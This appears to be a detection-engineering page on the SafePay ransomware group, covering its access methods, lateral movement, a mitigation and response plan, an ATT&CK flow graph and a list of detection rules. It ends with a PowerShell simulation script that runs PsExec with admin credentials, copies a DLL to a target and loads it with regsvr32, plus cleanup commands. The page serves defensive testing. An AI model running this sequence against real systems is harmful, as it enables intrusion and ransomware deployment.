Follow
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
SafePay is a recently surfaced ransomware operation that appears to run as a tightly controlled, centralized group rather than a typical Ransomware-as-a-Service ecosystem. The actors follow a double-extortion playbook, staging sensitive data ahead of encryption and threatening publication via a Tor-based leak site. Delivery commonly involves a native Windows DLL, with execution and propagation supported by widely available living-off-the-land utilities. In observed cases, the end-to-end timeline is aggressive, frequently compressing initial access through environment-wide encryption into roughly a 24-hour window.
Investigation
Researchers report that SafePay often secures entry through exposed VPN or RDP accounts using stolen or guessed credentials, and in some scenarios abuses misconfigured FortiGate deployments—particularly environments lacking MFA. For persistence, operators have been observed deploying backdoors such as QDoor and leveraging legitimate remote administration tooling, including ScreenConnect, to blend into normal IT activity. Lateral movement is typically driven through PsExec and WinRM, while host and share discovery is supported by a bespoke PowerShell utility (ShareFinder.ps1). Prior to encryption, the payload performs “pre-ransom” actions designed to maximize impact and hinder recovery: it removes shadow copies, alters boot configuration settings, and terminates a hard-coded set of security-related processes and services.
Mitigation
Require MFA across all remote access pathways and reduce firewall risk by restricting local account authentication and tightening administrative exposure. Monitor for anomalous use of PsExec, WinRM, regsvr32, and rundll32—especially in sequences consistent with remote execution and staging. Tune endpoint detections to surface termination of common security tooling, deletion of shadow copies, and changes to BCD/boot settings. Reduce execution opportunities by blocking or tightly controlling unsigned DLL loading and enforcing application control policies across endpoints and servers.
Response
When SafePay indicators are identified, isolate affected systems immediately, capture volatile memory, and preserve relevant authentication, endpoint, and network logs. Identify and block associated command-and-control infrastructure, then terminate malicious processes and remove persistence mechanisms. Attempt recovery actions such as restoring shadow copies where feasible, but assume data theft may have occurred and validate exfiltration scope. Complete a full forensic review to determine impacted data and execute stakeholder notifications and escalation steps aligned to double-extortion response procedures.
"graph TB %% Class definitions classDef technique fill:#99ccff classDef tool fill:#ffcc99 classDef operator fill:#ff9900 %% Initial Access tech_valid_accounts["<b>Technique</b> – T1078 Valid Accounts<br/>Adversaries use stolen or bruteu2011forced credentials to log into VPN or RDP"] class tech_valid_accounts technique tech_brute_force["<b>Technique</b> – T1110 Brute Force<br/>Password guessing to obtain valid credentials"] class tech_brute_force technique tool_vpn["<b>Tool</b> – VPN gateway"] class tool_vpn tool tool_rdp["<b>Tool</b> – RDP service"] class tool_rdp tool op_and_access(("AND")) class op_and_access operator %% Execution tech_regsvr32["<b>Technique</b> – T1218.010 Regsvr32<br/>Loads malicious DLL via registration"] class tech_regsvr32 technique tech_rundll32["<b>Technique</b> – T1218.011 Rundll32<br/>Executes code from a DLL"] class tech_rundll32 technique tech_powershell["<b>Technique</b> – T1059.001 PowerShell<br/>Runs PowerShell commands postu2011deployment"] class tech_powershell technique tech_cmd["<b>Technique</b> – T1059.003 Command Shell<br/>Runs Windows command line instructions"] class tech_cmd technique op_and_execution(("AND")) class op_and_execution operator %% Persistence tech_boot_autostart["<b>Technique</b> – T1547.010 Boot or Logon Autostart Execution<br/>DLL registered with Regsvr32 for persistence"] class tech_boot_autostart technique tech_appinit["<b>Technique</b> – T1546.010 AppInit DLLs<br/>Loads malicious DLL at system start"] class tech_appinit technique op_and_persistence(("AND")) class op_and_persistence operator %% Discovery tech_share_discovery["<b>Technique</b> – T1135 Network Share Discovery<br/>ShareFinder.ps1 enumerates SMB shares"] class tech_share_discovery technique %% Lateral Movement tech_psexec["<b>Technique</b> – T1021.002 PsExec<br/>Executes commands over SMB admin shares"] class tech_psexec technique tech_rdp_lm["<b>Technique</b> – T1021.001 Remote Services RDP<br/>Uses RDP for lateral movement"] class tech_rdp_lm technique tech_deploy_tools["<b>Technique</b> – T1072 Software Deployment Tools<br/>Leverages deployment utilities to run commands on remote hosts"] class tech_deploy_tools technique op_and_lateral(("AND")) class op_and_lateral operator %% Defense Evasion tech_service_stop["<b>Technique</b> – T1489 Service Stop<br/>Terminates antivirus or backup services"] class tech_service_stop technique tech_inhibit_recovery["<b>Technique</b> – T1490 Inhibit System Recovery<br/>Deletes VSS snapshots and edits boot config"] class tech_inhibit_recovery technique tech_cmstp["<b>Technique</b> – T1548.002 Bypass UAC via CMSTP<br/>Uses CMSTP to run code with elevated rights"] class tech_cmstp technique op_and_evasion(("AND")) class op_and_evasion operator %% Collection & Exfiltration tech_winrar["<b>Technique</b> – T1560.001 Archive via WinRAR<br/>Creates encrypted .rar archives of collected data"] class tech_winrar technique tech_lateral_transfer["<b>Technique</b> – T1570 Lateral Tool Transfer<br/>Moves archive files between compromised hosts"] class tech_lateral_transfer technique tech_ingress_transfer["<b>Technique</b> – T1105 Ingress Tool Transfer<br/>Uploads archives to external server"] class tech_ingress_transfer technique op_and_collection(("AND")) class op_and_collection operator %% Impact tech_encrypt_impact["<b>Technique</b> – T1486 Data Encrypted for Impact<br/>Encrypts files with AES/ChaCha20 and stores keys with RSA/x25519"] class tech_encrypt_impact technique %% Command and Control tech_encrypted_c2["<b>Technique</b> – T1573.001 Encrypted Channel Symmetric Cryptography<br/>Protects C2 traffic with encryption"] class tech_encrypted_c2 technique %% Flow connections %% Initial Access flow tech_brute_force –>|leads to| tech_valid_accounts tech_valid_accounts –>|uses| tool_vpn tech_valid_accounts –>|uses| tool_rdp tech_valid_accounts –>|enables| op_and_access op_and_access –>|leads to| tech_regsvr32 op_and_access –>|leads to| tech_rundll32 op_and_access –>|leads to| tech_powershell op_and_access –>|leads to| tech_cmd op_and_access –>|enables| op_and_execution op_and_execution –>|enables| tech_boot_autostart op_and_execution –>|enables| tech_appinit op_and_execution –>|enables| op_and_persistence op_and_persistence –>|leads to| tech_share_discovery tech_share_discovery –>|enables| op_and_lateral op_and_lateral –>|uses| tech_psexec op_and_lateral –>|uses| tech_rdp_lm op_and_lateral –>|uses| tech_deploy_tools op_and_lateral –>|enables| op_and_evasion op_and_evasion –>|uses| tech_service_stop op_and_evasion –>|uses| tech_inhibit_recovery op_and_evasion –>|uses| tech_cmstp op_and_evasion –>|enables| op_and_collection op_and_collection –>|uses| tech_winrar op_and_collection –>|uses| tech_lateral_transfer op_and_collection –>|uses| tech_ingress_transfer op_and_collection –>|leads to| tech_encrypt_impact tech_encrypt_impact –>|supports| tech_encrypted_c2 "
Attack Flow
Detections
Suspicious Bcdedit Execution (via cmdline)
View
Possible PowerShell Pre-Encryption Prep (RunAs + Recovery Inhibition) (via powershell)
View
Possible Lateral Movement via PsExec or Similar (via audit)
View
WMI Command Execution Using Windows Remote Management (via cmdline)
View
Suspicious VSSADMIN Activity (via cmdline)
View
PsExec Launched by User-Space Parent in Public Folders (via process_creation)
View
IOCs (Emails) to detect: Inside SafePay: Analyzing the New Centralized Ransomware Group
View
SafePay Ransomware Execution via PsExec and DLL Execution [Windows Process Creation]
View
SafePay Initial Access via Compromised Credentials and Misconfigured FortiGate [Firewall]
View
SafePay Ransomware Encrypted Files with .safepay Extension [Windows File Event]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.
-
Attack Narrative & Commands:
An adversary with Domain Administrator credentials compromises a pivot machine and uses PsExec to launch a remotecmd.exeon a secondary host (TARGET_IP). Immediately after establishing the remote shell, the attacker transfers a malicious DLL (malicious.dll) to the remote host and loads it using regsvr32.exe (alternatively rundll32.exe) to execute the ransomware payload. The sequence produces two distinct process‑creation events that satisfy the Sigma rule: a PsExec process with the exact command line and a subsequent DLL loader process. -
Regression Test Script:
# ------------------------------------------------------------------------- # SafePay Ransomware Simulation – PsExec + Regsvr32 # ------------------------------------------------------------------------- # Prerequisites: # - PsExec.exe in the current directory or in PATH # - A malicious DLL named malicious.dll placed in the same folder # - Valid domain admin credentials (replace placeholders) # ------------------------------------------------------------------------- $targetIP = "10.0.0.20" # <--- CHANGE TO YOUR TARGET $username = "DomainAdmin" # <--- CHANGE TO VALID USER $password = "Password123!" # <--- CHANGE TO VALID PASSWORD $dllPath = "$PSScriptRootmalicious.dll" # 1) Execute remote cmd.exe via PsExec Write-Host "[*] Launching remote cmd.exe via PsExec..." $psexecArgs = "\$targetIP -u $username -p $password cmd.exe" & .PsExec.exe $psexecArgs Start-Sleep -Seconds 5 # give remote session time to start # 2) Copy the malicious DLL to the remote host (using SMB) Write-Host "[*] Copying malicious DLL to remote host..." $destPath = "\$targetIPC$Tempmalicious.dll" Copy-Item -Path $dllPath -Destination $destPath -Force # 3) Load the DLL via regsvr32 (this generates the second event) Write-Host "[*] Loading malicious DLL with regsvr32..." $regsvrArgs = "/s $destPath" & regsvr32.exe $regsvrArgs Write-Host "[+] Simulation complete. Check SIEM for alerts." -
Cleanup Commands:
# ------------------------------------------------------------------------- # Cleanup for SafePay Simulation # ------------------------------------------------------------------------- $targetIP = "10.0.0.20" $dllRemote = "\$targetIPC$Tempmalicious.dll" # Remove the malicious DLL from the remote host Write-Host "[*] Removing malicious DLL from remote host..." Remove-Item -Path $dllRemote -Force -ErrorAction SilentlyContinue # Optionally terminate any lingering regsvr32/rundll32 processes Get-Process -Name regsvr32, rundll32 -ErrorAction SilentlyContinue | Where-Object {$_.Path -like "*$targetIP*"} | Stop-Process -Force Write-Host "[+] Cleanup complete."